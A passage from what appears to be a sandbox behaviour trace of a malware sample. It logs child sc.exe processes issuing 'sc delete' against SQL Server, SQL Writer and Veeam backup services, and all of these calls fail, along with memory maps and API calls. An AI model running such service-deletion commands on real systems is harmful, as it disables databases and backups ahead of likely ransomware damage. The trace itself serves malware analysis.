hConsoleOutput=0x24, lpBuffer=0xbcfab89850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xbcfaabfa58, lpReserved=0x0 | out: lpBuffer=0xbcfab89850*, lpNumberOfCharsWritten=0xbcfaabfa58*=0x62) returned 1 [0074.079] LocalFree (hMem=0xbcfab89850) returned 0x0 [0074.079] LocalFree (hMem=0x0) returned 0x0 [0074.079] CloseServiceHandle (hSCObject=0xbcfab889d0) returned 1 [0074.079] LocalFree (hMem=0x0) returned 0x0 [0074.079] exit (_Code=1060) Thread: id = 318 os_tid = 0x1228 Process: id = "18" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe3e6000" os_pid = "0x6c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SSISTELEMETRY130\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 403 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 404 start_va = 0x81f5580000 end_va = 0x81f559ffff entry_point = 0x0 region_type = private name = "private_0x00000081f5580000" filename = "" Region: id = 405 start_va = 0x81f55a0000 end_va = 0x81f55b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081f55a0000" filename = "" Region: id = 406 start_va = 0x81f55c0000 end_va = 0x81f563ffff entry_point = 0x0 region_type = private name = "private_0x00000081f55c0000" filename = "" Region: id = 407 start_va = 0x81f5640000 end_va = 0x81f5643fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081f5640000" filename = "" Region: id = 408 start_va = 0x81f5650000 end_va = 0x81f5650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081f5650000" filename = "" Region: id = 409 start_va = 0x81f5660000 end_va = 0x81f5661fff entry_point = 0x0 region_type = private name = "private_0x00000081f5660000" filename = "" Region: id = 410 start_va = 0x7df5ff150000 end_va = 0x7ff5ff14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff150000" filename = "" Region: id = 411 start_va = 0x7ff67ab90000 end_va = 0x7ff67abb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab90000" filename = "" Region: id = 412 start_va = 0x7ff67abb6000 end_va = 0x7ff67abb6fff entry_point = 0x0 region_type = private name = "private_0x00007ff67abb6000" filename = "" Region: id = 413 start_va = 0x7ff67abbe000 end_va = 0x7ff67abbffff entry_point = 0x0 region_type = private name = "private_0x00007ff67abbe000" filename = "" Region: id = 414 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 415 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 471 start_va = 0x81f5860000 end_va = 0x81f595ffff entry_point = 0x0 region_type = private name = "private_0x00000081f5860000" filename = "" Region: id = 472 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 473 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4910 start_va = 0x81f5580000 end_va = 0x81f558ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081f5580000" filename = "" Region: id = 4911 start_va = 0x81f5590000 end_va = 0x81f5596fff entry_point = 0x0 region_type = private name = "private_0x00000081f5590000" filename = "" Region: id = 4912 start_va = 0x81f5670000 end_va = 0x81f572dfff entry_point = 0x81f5670000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4913 start_va = 0x81f5730000 end_va = 0x81f57affff entry_point = 0x0 region_type = private name = "private_0x00000081f5730000" filename = "" Region: id = 4914 start_va = 0x81f5a40000 end_va = 0x81f5a4ffff entry_point = 0x0 region_type = private name = "private_0x00000081f5a40000" filename = "" Region: id = 4915 start_va = 0x7ff67aa90000 end_va = 0x7ff67ab8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa90000" filename = "" Region: id = 4916 start_va = 0x7ff67abbc000 end_va = 0x7ff67abbdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67abbc000" filename = "" Region: id = 4917 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4918 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4925 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4926 start_va = 0x81f57b0000 end_va = 0x81f57b6fff entry_point = 0x0 region_type = private name = "private_0x00000081f57b0000" filename = "" Region: id = 4927 start_va = 0x81f5960000 end_va = 0x81f5a3efff entry_point = 0x81f5960000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4928 start_va = 0x81f57c0000 end_va = 0x81f57d1fff entry_point = 0x81f57c0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 19 os_tid = 0x468 [0073.477] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0073.477] __set_app_type (_Type=0x1) [0073.477] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0073.477] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0073.478] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.563] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.563] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0073.563] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0073.563] _wcsicmp (_String1="delete", _String2="query") returned -13 [0073.563] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="start") returned -15 [0073.564] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0073.564] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0073.564] _wcsicmp (_String1="delete", _String2="control") returned 1 [0073.564] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0073.564] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0073.564] _wcsicmp (_String1="delete", _String2="config") returned 1 [0073.564] _wcsicmp (_String1="delete", _String2="description") returned -7 [0073.564] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0073.564] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0073.564] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0073.564] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0073.564] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0073.564] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0073.564] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0073.564] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0073.564] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0073.564] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0073.564] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0073.564] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0073.566] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x81f58689a0 [0073.571] OpenServiceW (hSCManager=0x81f58689a0, lpServiceName="SSISTELEMETRY130", dwDesiredAccess=0x10000) returned 0x0 [0073.572] GetLastError () returned 0x424 [0073.572] _ultow (in: _Dest=0x424, _Radix=-177997128 | out: _Dest=0x424) returned="1060" [0073.572] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0073.573] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x81f563fa70, nSize=0x2, Arguments=0x81f563faa0 | out: lpBuffer="顐\x81") returned 0x62 [0073.574] GetFileType (hFile=0x24) returned 0x2 [0073.574] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x81f563fa20 | out: lpMode=0x81f563fa20) returned 1 [0073.737] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x81f5869850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x81f563fa18, lpReserved=0x0 | out: lpBuffer=0x81f5869850*, lpNumberOfCharsWritten=0x81f563fa18*=0x62) returned 1 [0073.738] LocalFree (hMem=0x81f5869850) returned 0x0 [0073.738] LocalFree (hMem=0x0) returned 0x0 [0073.738] CloseServiceHandle (hSCObject=0x81f58689a0) returned 1 [0073.738] LocalFree (hMem=0x0) returned 0x0 [0073.738] exit (_Code=1060) Thread: id = 317 os_tid = 0x1224 Process: id = "19" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe203000" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLWriter\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 416 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 417 start_va = 0xb37e7c0000 end_va = 0xb37e7dffff entry_point = 0x0 region_type = private name = "private_0x000000b37e7c0000" filename = "" Region: id = 418 start_va = 0xb37e7e0000 end_va = 0xb37e7f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b37e7e0000" filename = "" Region: id = 419 start_va = 0xb37e800000 end_va = 0xb37e87ffff entry_point = 0x0 region_type = private name = "private_0x000000b37e800000" filename = "" Region: id = 420 start_va = 0xb37e880000 end_va = 0xb37e883fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b37e880000" filename = "" Region: id = 421 start_va = 0xb37e890000 end_va = 0xb37e890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b37e890000" filename = "" Region: id = 422 start_va = 0xb37e8a0000 end_va = 0xb37e8a1fff entry_point = 0x0 region_type = private name = "private_0x000000b37e8a0000" filename = "" Region: id = 423 start_va = 0x7df5ff100000 end_va = 0x7ff5ff0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff100000" filename = "" Region: id = 424 start_va = 0x7ff67a8e0000 end_va = 0x7ff67a902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a8e0000" filename = "" Region: id = 425 start_va = 0x7ff67a90b000 end_va = 0x7ff67a90bfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a90b000" filename = "" Region: id = 426 start_va = 0x7ff67a90e000 end_va = 0x7ff67a90ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a90e000" filename = "" Region: id = 427 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 428 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 474 start_va = 0xb37e9b0000 end_va = 0xb37eaaffff entry_point = 0x0 region_type = private name = "private_0x000000b37e9b0000" filename = "" Region: id = 475 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 476 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3860 start_va = 0xb37e7c0000 end_va = 0xb37e7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b37e7c0000" filename = "" Region: id = 3861 start_va = 0xb37e7d0000 end_va = 0xb37e7d6fff entry_point = 0x0 region_type = private name = "private_0x000000b37e7d0000" filename = "" Region: id = 3862 start_va = 0xb37e8b0000 end_va = 0xb37e96dfff entry_point = 0xb37e8b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3863 start_va = 0xb37eab0000 end_va = 0xb37eb2ffff entry_point = 0x0 region_type = private name = "private_0x000000b37eab0000" filename = "" Region: id = 3864 start_va = 0xb37ed00000 end_va = 0xb37ed0ffff entry_point = 0x0 region_type = private name = "private_0x000000b37ed00000" filename = "" Region: id = 3865 start_va = 0x7ff67a7e0000 end_va = 0x7ff67a8dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a7e0000" filename = "" Region: id = 3866 start_va = 0x7ff67a90c000 end_va = 0x7ff67a90dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a90c000" filename = "" Region: id = 3867 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3868 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3881 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3882 start_va = 0xb37e970000 end_va = 0xb37e976fff entry_point = 0x0 region_type = private name = "private_0x000000b37e970000" filename = "" Region: id = 3883 start_va = 0xb37eb30000 end_va = 0xb37ec0efff entry_point = 0xb37eb30000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3884 start_va = 0xb37e980000 end_va = 0xb37e991fff entry_point = 0xb37e980000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 20 os_tid = 0x620 [0065.922] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0065.922] __set_app_type (_Type=0x1) [0065.922] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0065.922] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0065.922] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.147] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0066.147] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0066.147] _wcsicmp (_String1="delete", _String2="query") returned -13 [0066.147] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0066.147] _wcsicmp (_String1="delete", _String2="start") returned -15 [0066.147] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0066.147] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0066.147] _wcsicmp (_String1="delete", _String2="control") returned 1 [0066.147] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0066.147] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0066.147] _wcsicmp (_String1="delete", _String2="config") returned 1 [0066.147] _wcsicmp (_String1="delete", _String2="description") returned -7 [0066.147] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0066.147] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0066.148] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0066.148] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0066.148] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0066.148] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0066.148] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0066.148] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0066.148] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0066.148] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0066.148] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0066.148] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0066.150] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xb37e9b8cb0 [0066.156] OpenServiceW (hSCManager=0xb37e9b8cb0, lpServiceName="SQLWriter", dwDesiredAccess=0x10000) returned 0x0 [0066.156] GetLastError () returned 0x424 [0066.156] _ultow (in: _Dest=0x424, _Radix=2122840776 | out: _Dest=0x424) returned="1060" [0066.156] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0066.158] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xb37e87fa80, nSize=0x2, Arguments=0xb37e87fab0 | out: lpBuffer="鎰纛³") returned 0x62 [0066.159] GetFileType (hFile=0x24) returned 0x2 [0066.159] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xb37e87fa30 | out: lpMode=0xb37e87fa30) returned 1 [0066.272] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xb37e9b93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb37e87fa28, lpReserved=0x0 | out: lpBuffer=0xb37e9b93b0*, lpNumberOfCharsWritten=0xb37e87fa28*=0x62) returned 1 [0066.272] LocalFree (hMem=0xb37e9b93b0) returned 0x0 [0066.272] LocalFree (hMem=0x0) returned 0x0 [0066.273] CloseServiceHandle (hSCObject=0xb37e9b8cb0) returned 1 [0066.273] LocalFree (hMem=0x0) returned 0x0 [0066.273] exit (_Code=1060) Thread: id = 254 os_tid = 0x10fc Process: id = "20" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe3f0000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQL$VEEAMSQL2012\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 477 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 478 start_va = 0xe19ae0000 end_va = 0xe19afffff entry_point = 0x0 region_type = private name = "private_0x0000000e19ae0000" filename = "" Region: id = 479 start_va = 0xe19b00000 end_va = 0xe19b13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000e19b00000" filename = "" Region: id = 480 start_va = 0xe19b20000 end_va = 0xe19b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000e19b20000" filename = "" Region: id = 481 start_va = 0xe19ba0000 end_va = 0xe19ba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000e19ba0000" filename = "" Region: id = 482 start_va = 0xe19bb0000 end_va = 0xe19bb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000e19bb0000" filename = "" Region: id = 483 start_va = 0x7df5ff550000 end_va = 0x7ff5ff54ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff550000" filename = "" Region: id = 484 start_va = 0x7ff67ac40000 end_va = 0x7ff67ac62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ac40000" filename = "" Region: id = 485 start_va = 0x7ff67ac67000 end_va = 0x7ff67ac67fff entry_point = 0x0 region_type = private name = "private_0x00007ff67ac67000" filename = "" Region: id = 486 start_va = 0x7ff67ac6e000 end_va = 0x7ff67ac6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67ac6e000" filename = "" Region: id = 487 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 488 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 705 start_va = 0xe19bc0000 end_va = 0xe19bc1fff entry_point = 0x0 region_type = private name = "private_0x0000000e19bc0000" filename = "" Region: id = 1633 start_va = 0xe19d20000 end_va = 0xe19e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000e19d20000" filename = "" Region: id = 1634 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1635 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5153 start_va = 0xe19ae0000 end_va = 0xe19aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000e19ae0000" filename = "" Region: id = 5154 start_va = 0xe19af0000 end_va = 0xe19af6fff entry_point = 0x0 region_type = private name = "private_0x0000000e19af0000" filename = "" Region: id = 5155 start_va = 0xe19bd0000 end_va = 0xe19c8dfff entry_point = 0xe19bd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5156 start_va = 0xe19c90000 end_va = 0xe19d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000e19c90000" filename = "" Region: id = 5157 start_va = 0xe19ff0000 end_va = 0xe19ffffff entry_point = 0x0 region_type = private name = "private_0x0000000e19ff0000" filename = "" Region: id = 5158 start_va = 0x7ff67ab40000 end_va = 0x7ff67ac3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab40000" filename = "" Region: id = 5159 start_va = 0x7ff67ac6c000 end_va = 0x7ff67ac6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67ac6c000" filename = "" Region: id = 5160 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5161 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5163 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5164 start_va = 0xe19d10000 end_va = 0xe19d16fff entry_point = 0x0 region_type = private name = "private_0x0000000e19d10000" filename = "" Region: id = 5165 start_va = 0xe19e20000 end_va = 0xe19efefff entry_point = 0xe19e20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5166 start_va = 0xe19f00000 end_va = 0xe19f11fff entry_point = 0xe19f00000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 21 os_tid = 0x298 [0076.570] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0076.570] __set_app_type (_Type=0x1) [0076.570] SetUnhandledExceptionFilter 